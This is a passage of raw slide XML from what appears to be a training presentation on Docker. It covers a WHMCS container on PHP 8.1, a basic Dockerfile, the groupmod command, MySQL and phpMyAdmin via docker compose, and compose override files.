                <a:srgbClr val="A32EFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>entrypoint.sh</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>index.html</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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3" name="Shape 4753"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4754" name="Google Shape;4754;p771"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="348150" y="320975"/>
            <a:ext cx="8572500" cy="4762500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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8" name="Shape 4758"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4759" name="Google Shape;4759;p772"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273350" y="149700"/>
            <a:ext cx="8743500" cy="880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2700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create a WHMCS Container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4760" name="Google Shape;4760;p772"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="529475" y="1100100"/>
            <a:ext cx="8335500" cy="3891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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>WHMCS </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = Web Host Manager Complete Solution</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In which language whmcs is built ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="45818E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHMCS is built primarily in </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="45818E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="45818E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="45818E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="45818E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I want to install </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whmcs 8.10.1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="45818E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="DC143C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP 8.1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="DC143C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>What are the requirement?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="45818E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="45818E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="45818E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>First check all extension with</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="45818E"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="45818E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php -m | grep fileinfo</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="45818E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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4" name="Shape 4764"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4765" name="Google Shape;4765;p773"/>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HOw to create up and running ubuntu container ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4766" name="Google Shape;4766;p7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36666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM php:8.1-apache</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CMD ["apachectl", "-D","FOREGROUND"]</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker run -d </a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1588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How to modify a linux group?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="Google Shape;544;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="855925" y="2329100"/>
            <a:ext cx="7213500" cy="1079400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit fontScale="70000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>roupmod -g 1001  &lt;groupName&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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0" name="Shape 4770"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4771" name="Google Shape;4771;p774"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="70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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create a MySQL and PhpMyAdmin Container using Docker compose</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4772" name="Google Shape;4772;p774"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="306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solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PhpMyadmin</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hostname</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	UserName</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Password</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Database</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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6" name="Shape 4776"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4777" name="Google Shape;4777;p775"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="70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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Understand docker-compose.override.yml</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4778" name="Google Shape;4778;p775"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="135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400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With the help of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>override</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file i can get latest image with version</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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2" name="Shape 4782"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4783" name="Google Shape;4783;p776"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379275" y="324000"/>
            <a:ext cx="7913100" cy="70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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to build override file?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4784" name="Google Shape;4784;p776"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1031400"/>
            <a:ext cx="8520600" cy="2733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770"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker-compose -f base.yml -f  override.yml up -d</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
